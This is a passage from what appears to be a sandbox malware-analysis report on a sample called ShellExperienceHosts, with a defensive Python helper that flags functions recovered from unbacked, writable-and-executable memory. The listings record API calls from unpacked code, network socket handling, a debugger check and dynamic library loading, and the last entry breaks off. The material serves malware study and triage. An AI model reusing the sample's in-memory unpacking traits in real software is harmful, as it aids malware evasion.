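The function above is the only one in this part of the listing whose dump region is marked "based on PE: false" (offset 02230000): the sandbox recovered it from memory that no loaded image accounts for, which is the kind of region the report's "creates a PE file in dynamic memory" signature is about. For triaging a long listing like this one, the Python below is an added helper, not part of the Joe Sandbox report or its tooling: it parses function blocks in this listing's layout into records and flags those recovered from non-PE-backed memory. The sample text is constructed here from values on this page. Reading the fifth dot-separated field of the .sdmp file name as the region's Win32 page protection (so 0x40 = PAGE_EXECUTE_READWRITE) is an assumption about Joe Sandbox's naming convention, not something the report documents; the "based on PE" flag is the report's own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample in the layout of this listing; values are copied from the page
# (the non-PE-backed region at 02230000 and a function in the module at 10000000).
SAMPLE = """\
APIs
• __CreateFrameInfo.LIBCMT ref: 022436A2
  • Part of subcall function 02243232: __getptd.LIBCMT ref: 02243240
Memory Dump Source
• Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
• Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
• Instruction Fuzzy Hash: 9B11E2B1C103099FDB01EFE4C945AAE7BB1FF48310F1084AAE814AB254EB789A549F50
APIs
• EnterCriticalSection.KERNEL32(?,?,00000000), ref: 10004B63
• LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 10004B80
Memory Dump Source
• Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
• Instruction Fuzzy Hash: 4A0184765006109FE310DB75ECC8B9BB3E8EB8C355F064819E10687100C735FC458AA4
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: Optional[str]
    ref: int        # call-site address
    nested: bool    # True for "Part of subcall function" lines

@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    source_file: str = ""
    offset: int = 0
    based_on_pe: Optional[bool] = None
    snapshot: str = ""
    fuzzy_hash: str = ""

API_RE = re.compile(r"^(?P<name>[^.\s(]+)\.(?P<module>[A-Za-z0-9]+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SOURCE_RE = re.compile(r"^Source File:\s*(?P<file>\S+?\.sdmp),\s*Offset:\s*"
                       r"(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
SUBCALL = "Part of subcall function "
RWX = {0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}  # Win32 writable+executable

def parse_api_line(item: str) -> Optional[ApiCall]:
    """Parse 'Name.MODULE(args), ref: ADDR', top-level or nested under a subcall."""
    nested = item.startswith(SUBCALL)
    if nested:
        item = item.split(": ", 1)[1]
    m = API_RE.match(item)
    return ApiCall(m["name"], m["module"], m["args"], int(m["ref"], 16), nested) if m else None

def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split the listing into FunctionBlock records; each 'APIs' heading opens one."""
    blocks: List[FunctionBlock] = []
    cur: Optional[FunctionBlock] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            blocks.append(cur := FunctionBlock())
        elif cur is None or not line.startswith("•"):
            continue                   # section headings, or text before the first block
        else:
            item = line[1:].strip()
            key, _, val = item.partition(":")
            if key == "Source File" and (m := SOURCE_RE.match(item)):
                cur.source_file, cur.offset = m["file"], int(m["offset"], 16)
                cur.based_on_pe = m["pe"] == "true"
            elif key == "Snapshot File":
                cur.snapshot = val.strip()
            elif key == "Instruction Fuzzy Hash":
                cur.fuzzy_hash = val.strip()
            elif call := parse_api_line(item):   # ID/hash bullets fail API_RE and are skipped
                cur.apis.append(call)
    return blocks

def region_protection(sdmp_name: str) -> int:
    """ASSUMPTION (not documented in the report): the fifth dot-separated field of an
    .sdmp file name is the region's Win32 page protection when it was dumped."""
    return int(sdmp_name.split(".")[4], 16)

def triage(blocks: List[FunctionBlock]) -> List[dict]:
    """Flag functions recovered from memory that no loaded PE image accounts for."""
    findings = []
    for b in blocks:
        reasons = []
        if b.based_on_pe is False:
            reasons.append("not backed by a PE image (unpacked or injected code)")
        prot = region_protection(b.source_file) if b.source_file else 0
        if prot in RWX:
            reasons.append("region dumped as " + RWX[prot])
        if reasons:
            findings.append({"offset": b.offset, "snapshot": b.snapshot, "reasons": reasons,
                             "apis": [a.name for a in b.apis if not a.nested]})
    return findings
```

`triage(parse_blocks(SAMPLE))` returns one finding, for offset 02230000, with both reasons; the function in the module at 10000000 is not flagged because the report marks it PE-backed and its region was dumped as PAGE_EXECUTE_READ. Feeding the full listing through the same parser and grouping findings by snapshot file gives the set of unpacked functions worth opening first in the IDA snapshot.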
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 10004B63
                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 10004B6D
                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 10004B80
                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 10004B83
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 3168844106-0
                                                                            • Opcode ID: 3c4cb16bca3ae15824b6f58c01f312d0d5f5bcc1af3ff3d380ee54a514ce913b
                                                                            • Instruction ID: aa03fd3e3b24d4ff679a20f9d9d19219b814eae2566e95c25fa4737bddb7a95c
                                                                            • Opcode Fuzzy Hash: 3c4cb16bca3ae15824b6f58c01f312d0d5f5bcc1af3ff3d380ee54a514ce913b
                                                                            • Instruction Fuzzy Hash: 4A0184765006109FE310DB75ECC8B9BB3E8EB8C355F064819E10687100C735FC458AA4
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 6C706B8F
                                                                            • ScreenToClient.USER32(?,?), ref: 6C706B9C
                                                                            • PtInRect.USER32(?,?,?), ref: 6C706BAF
                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 6C706BD1
                                                                            • SetCursor.USER32(?), ref: 6C706BEF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$ClientLoadRectScreen
                                                                            • String ID:
                                                                            • API String ID: 2747913190-0
                                                                            • Opcode ID: 4518deff5e490e8ceedbfbd23a81c278b332c705b457c5cc2b34f9dd9df91d3f
                                                                            • Instruction ID: 3e7cd8220cd77dbc0962e245a166d5b21a83738c2ea23ff14e38f0ff56f98981
                                                                            • Opcode Fuzzy Hash: 4518deff5e490e8ceedbfbd23a81c278b332c705b457c5cc2b34f9dd9df91d3f
                                                                            • Instruction Fuzzy Hash: A10127B1A0410AEBDF215FA1C908DEE7FB8EF49219B0040BAE516D3520DB30AA40DBA5
                                                                            APIs
                                                                            • ScreenToClient.USER32(?,?), ref: 6C7BEEDE
                                                                            • SendMessageW.USER32(?,00000366,00000000,00000000), ref: 6C7BEEFA
                                                                            • ClientToScreen.USER32(?,?), ref: 6C7BEF07
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 6C7BEF10
                                                                            • GetParent.USER32(?), ref: 6C7BEF1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClientScreen$LongMessageParentSendWindow
                                                                            • String ID:
                                                                            • API String ID: 4240056119-0
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(10015EB4,10017C00,00000008,022398C1,00000000,00000000,?,0000FFFF,022370E9,0223BB26), ref: 022397CA
                                                                            • __lock.LIBCMT ref: 022397FE
                                                                              • Part of subcall function 0223C11B: __amsg_exit.LIBCMT ref: 0223C13D
                                                                              • Part of subcall function 0223C11B: RtlEnterCriticalSection.NTDLL(00000001), ref: 0223C145
                                                                            • InterlockedIncrement.KERNEL32(?), ref: 0223980B
                                                                            • __lock.LIBCMT ref: 0223981F
                                                                            • ___addlocaleref.LIBCMT ref: 0223983D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit
                                                                            • String ID:
                                                                            • API String ID: 3732598078-0
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02232D13
                                                                            • CancelIo.KERNEL32(?), ref: 02232D1D
                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02232D26
                                                                            • closesocket.WS2_32(?), ref: 02232D30
                                                                            • SetEvent.KERNEL32(00000001), ref: 02232D3A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                            • String ID:
                                                                            • API String ID: 1486965892-0
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 0223E122
                                                                              • Part of subcall function 022398E6: __getptd_noexit.LIBCMT ref: 022398E9
                                                                              • Part of subcall function 022398E6: __amsg_exit.LIBCMT ref: 022398F6
                                                                            • __getptd.LIBCMT ref: 0223E139
                                                                            • __amsg_exit.LIBCMT ref: 0223E147
                                                                            • __lock.LIBCMT ref: 0223E157
                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0223E16B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                            • String ID:
                                                                            • API String ID: 938513278-0
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 031B49D1
                                                                              • Part of subcall function 031B381A: __getptd_noexit.LIBCMT ref: 031B381D
                                                                              • Part of subcall function 031B381A: __amsg_exit.LIBCMT ref: 031B382A
                                                                            • __getptd.LIBCMT ref: 031B49E8
                                                                            • __amsg_exit.LIBCMT ref: 031B49F6
                                                                            • __lock.LIBCMT ref: 031B4A06
                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 031B4A1A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                            • String ID:
                                                                            • API String ID: 938513278-0
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 1000E14B
                                                                              • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                              • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                            • __getptd.LIBCMT ref: 1000E162
                                                                            • __amsg_exit.LIBCMT ref: 1000E170
                                                                            • __lock.LIBCMT ref: 1000E180
                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 1000E194
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                            • String ID:
                                                                            • API String ID: 938513278-0
                                                                            APIs
                                                                              • Part of subcall function 100082F0: _doexit.LIBCMT ref: 100082FC
                                                                            • ___set_flsgetvalue.LIBCMT ref: 100071BC
                                                                              • Part of subcall function 10009754: TlsGetValue.KERNEL32(00000000,100098AD,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000), ref: 1000975D
                                                                              • Part of subcall function 10009754: DecodePointer.KERNEL32(?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA,0000000D), ref: 1000976F
                                                                              • Part of subcall function 10009754: TlsSetValue.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 1000977E
                                                                            • ___fls_getvalue@4.LIBCMT ref: 100071C7
                                                                              • Part of subcall function 10009734: TlsGetValue.KERNEL32(?,?,100071CC,00000000), ref: 10009742
                                                                            • ___fls_setvalue@8.LIBCMT ref: 100071DA
                                                                              • Part of subcall function 10009788: DecodePointer.KERNEL32(?,?,?,100071DF,00000000,?,00000000), ref: 10009799
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 100071E3
                                                                            • ExitThread.KERNEL32 ref: 100071EA
                                                                            • GetCurrentThreadId.KERNEL32 ref: 100071F0
                                                                            • __freefls@4.LIBCMT ref: 10007210
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                            • String ID:
                                                                            • API String ID: 781180411-0
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C718C48
                                                                              • Part of subcall function 6C7C2EEA: __EH_prolog3.LIBCMT ref: 6C7C2EF1
                                                                              • Part of subcall function 6C770A0E: GetDlgCtrlID.USER32(?), ref: 6C770A19
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3$Ctrl
                                                                            • String ID: %TsMFCToolBar-%d$%TsMFCToolBar-%d%x$MFCToolBars
                                                                            • API String ID: 3879667756-2016111687
                                                                            APIs
                                                                              • Part of subcall function 6C73863C: LoadLibraryW.KERNEL32(?,6C8DC788,00000010,6C738AB6,?), ref: 6C73867D
                                                                            • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 6C7A0E17
                                                                            • FreeLibrary.KERNEL32(00000000,?,0000003C,6C812B1C,?,6C8134D3,00000000,?,00000000), ref: 6C7A0E63
                                                                              • Part of subcall function 6C7A0A16: GetLastError.KERNEL32(6C7A0E0E,comctl32.dll,00000000,?,0000003C,6C812B1C,?,6C8134D3,00000000,?,00000000), ref: 6C7A0A16
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressErrorFreeLastLoadProc
                                                                            • String ID: DllGetVersion$comctl32.dll
                                                                            • API String ID: 2540614322-3857068685
                                                                            APIs
                                                                            • ___BuildCatchObject.LIBCMT ref: 02243A3A
                                                                              • Part of subcall function 02243995: ___BuildCatchObjectHelper.LIBCMT ref: 022439CB
                                                                            • _UnwindNestedFrames.LIBCMT ref: 02243A51
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                            • String ID: csm$csm
                                                                            • API String ID: 3487967840-3733052814
                                                                            APIs
                                                                            • GetWindowLongW.USER32(6C7A9C68,000000F0), ref: 6C7A0B81
                                                                            • GetClassNameW.USER32(6C7A9C68,?,0000000A), ref: 6C7A0B96
                                                                            • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF,?,?,?,000000FF,6C7A9C68,6C741795,00000000), ref: 6C7A0BAD
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClassCompareLongNameStringWindow
                                                                            • String ID: combobox
                                                                            • API String ID: 1414938635-2240613097
                                                                            • Opcode ID: 758065694a0b21bb40dac77d413639d46693cde824ca514ba0083147266dfea5
                                                                            • Instruction ID: 4f40730b636d087772fabbb07a242f693f01788bb4a2cb70d3e093ef7710ba40
                                                                            • Instruction Fuzzy Hash: C5F0A431755219BBCF10DBA8CD45EAE77B8AB07728F500735F522E71C0DA24A905C799
                                                                            APIs
                                                                            • swprintf.LIBCMT ref: 6C6EECA4
                                                                            • GetFileAttributesW.KERNEL32(?,6C764AD4,?), ref: 6C6EECAF
                                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,6C771DF0,?,afx,?,00000104,?,?,00000000), ref: 6C6EECC7
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesNameTempswprintf
                                                                            • String ID: %s%s%X.tmp
                                                                            • API String ID: 2659213859-596088238
                                                                            • Opcode ID: 4cef556f1a9d03a98d143dc6fd7355c0d7db3dfe29a713a1e70703f378f5a5f4
                                                                            • Instruction ID: 2476950a83af0157240c6cbe72b8a86de2620adbfa377141a809a1c0656f27aa
                                                                            • Instruction Fuzzy Hash: C8F0583250020ABBCF019F95CE09ECD3F36FF083A9F104951FA20A04A0D736DA24AB88
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6C86E4FF,00000000,?,6C8F553C,?,?,?,6C86E436,00000004,InitializeCriticalSectionEx,6C8B7644,6C8B764C), ref: 6C86E470
                                                                            • GetLastError.KERNEL32(?,6C86E4FF,00000000,?,6C8F553C,?,?,?,6C86E436,00000004,InitializeCriticalSectionEx,6C8B7644,6C8B764C,00000000,?,6C8634BC), ref: 6C86E47A
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6C86E4A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID: api-ms-
                                                                            • API String ID: 3177248105-2084034818
                                                                            • Opcode ID: 8c5ea90ca285d41c1ecaafb7266f881007b0775e5cfce2a3f5dd2b4ab1b992ad
                                                                            • Instruction ID: b782c55c4479f6a036deb0d1d2318082ceec00eedc1a89895203b25ee692224a
                                                                            • Instruction Fuzzy Hash: 44E01230344609BBEB301A66DD09B593A64AF01779F244830F90DA8D94D765E85097C9
                                                                            APIs
                                                                              • Part of subcall function 6C6B21FE: InitializeCriticalSectionEx.KERNEL32(6C8F0E84,00000000,00000000,EFCA8B15,?,?,?,6C6B10B9), ref: 6C6B2273
                                                                              • Part of subcall function 6C6B21FE: GetLastError.KERNEL32(EFCA8B15,?,?,?,6C6B10B9), ref: 6C6B22AB
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,6C6E0B04), ref: 6C79EF2A
                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6C6E0B04), ref: 6C79EF39
                                                                            Strings
                                                                            • MZx, xrefs: 6C79EEFF
                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6C79EF34
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$MZx
                                                                            • API String ID: 3511171328-1466369552
                                                                            • Opcode ID: 882b1e96545cd092ac0f427e92b30b5037da94affcea571cb9290fcf566eea83
                                                                            • Instruction ID: 06c7b42e6b3be86a9fdaea24aa60e2747ba2ee781ec2c6b6ae871a4aceadadea
                                                                            • Instruction Fuzzy Hash: 36E039702047508BD7708F28E6087967AE4AB05358F008C6DD456D2B40EBB8E888CBA1
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C6F6A4A
                                                                            • SendMessageW.USER32(?,00000229,00000000,00000000), ref: 6C6F6A7D
                                                                            • GetWindow.USER32(?,00000005), ref: 6C6F6B8C
                                                                              • Part of subcall function 6C6F6261: BringWindowToTop.USER32(?), ref: 6C6F6301
                                                                              • Part of subcall function 6C6F6261: RedrawWindow.USER32(?,00000000,00000000,00000585), ref: 6C6F6355
                                                                              • Part of subcall function 6C6F6261: RedrawWindow.USER32(00000000,00000000,00000000,00000585), ref: 6C6F6361
                                                                            • GetWindow.USER32(?,00000002), ref: 6C6F6BE6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Redraw$BringH_prolog3MessageSend
                                                                            • String ID:
                                                                            • API String ID: 259967589-0
                                                                            • Opcode ID: d1e77baa5ed2107b3a26cbd51e124001af9575264f1884dc436fda52f36bf585
                                                                            • Instruction ID: 6637a7be27088c0b95498f21e8556f611743c3c1e03f58526c4bd4e0371e87ef
